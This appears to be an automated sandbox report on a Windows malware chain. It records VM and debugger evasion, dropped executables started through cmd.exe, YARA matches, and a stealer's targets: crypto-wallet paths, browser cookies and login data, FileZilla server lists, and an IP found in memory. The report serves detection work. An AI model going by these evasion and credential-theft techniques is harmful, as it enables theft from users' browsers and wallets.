Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645513517.000001F414940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: VBoxService.exe
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: 1c593ec106.exe, 0000001F.00000002.2936767105.00000000020D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: VMWare
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.000000000272E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9c
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Thread information set: HideFromDebugger
Source: C:\Users\userKFHCAEGCBF.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Code function: 0_2_04C80081 Start: 04C8041B End: 04C800AA 0_2_04C80081
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Code function: 0_2_04C80B54 Start: 04C80B74 End: 04C80B70 0_2_04C80B54
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Process queried: DebugPort
Source: C:\Users\userKFHCAEGCBF.exe Process queried: DebugPort
Source: C:\Users\userKFHCAEGCBF.exe Process queried: DebugPort
Source: C:\Users\userKFHCAEGCBF.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Code function: 0_2_04C80CC5 rdtsc 0_2_04C80CC5
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_0041ACFA
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_00404610 VirtualProtect ?,00000004,00000100,00000000 8_2_00404610
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 8_2_0041BA2C
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0034645B mov eax, dword ptr fs:[00000030h] 7_2_0034645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0034A1C2 mov eax, dword ptr fs:[00000030h] 7_2_0034A1C2
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_00419160 mov eax, dword ptr fs:[00000030h] 8_2_00419160
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_00405000 GetProcessHeap,HeapAlloc,memcpy, 8_2_00405000
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_0041C8D9 SetUnhandledExceptionFilter, 8_2_0041C8D9
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_0041ACFA
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_0041A718
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_6C1FB66C
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_6C1FB1F7
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_6C3AAC62
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 848, type: MEMORYSTR
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userKFHCAEGCBF.exe "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\userKFHCAEGCBF.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 8_2_6C3F4760
Source: 1c593ec106.exe, 00000009.00000002.2918001289.0000000000452000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2917186375.0000000000452000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2919090874.0000000000452000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorti.exe, explorti.exe, 00000007.00000002.2920362161.000000000050B000.00000040.00000001.01000000.00000007.sdmp, userKFHCAEGCBF.exe, 00000012.00000002.2598761608.0000000000DF9000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0032D312 cpuid 7_2_0032D312
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0032CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_0032CB1A

Stealing of Sensitive Information

Source: Yara match File source: 2.2.explorti.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.8NjcvPNvUr.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.axplong.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.userKFHCAEGCBF.exe.c10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RoamingHJDBKJKFIE.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorti.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.axplong.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorti.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2597088663.0000000000C11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1671801821.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1675477265.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2918910724.0000000000311000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1686962382.0000000000251000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2917060920.0000000000161000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2581050540.0000000000C31000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.2894591592.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2583529473.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2624183793.0000000000161000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1646914166.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2556118142.0000000005400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1715844262.0000000000311000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1712103381.0000000000311000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2288311449.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2539138364.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 848, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: 8ec8c5c339.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: 8ec8c5c339.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: 8ec8c5c339.exe String found in binary or memory: \jaxx\Local Storage\
Source: 8ec8c5c339.exe String found in binary or memory: passphrase.json
Source: 8ec8c5c339.exe String found in binary or memory: \Ethereum\
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 185.215.113.16nes\AppData\Roaming\Binance\simple-storage.json
Source: 8ec8c5c339.exe String found in binary or memory: Ethereum
Source: 8ec8c5c339.exe String found in binary or memory: file__0.localstorage
Source: 8ec8c5c339.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: 8ec8c5c339.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: 8ec8c5c339.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
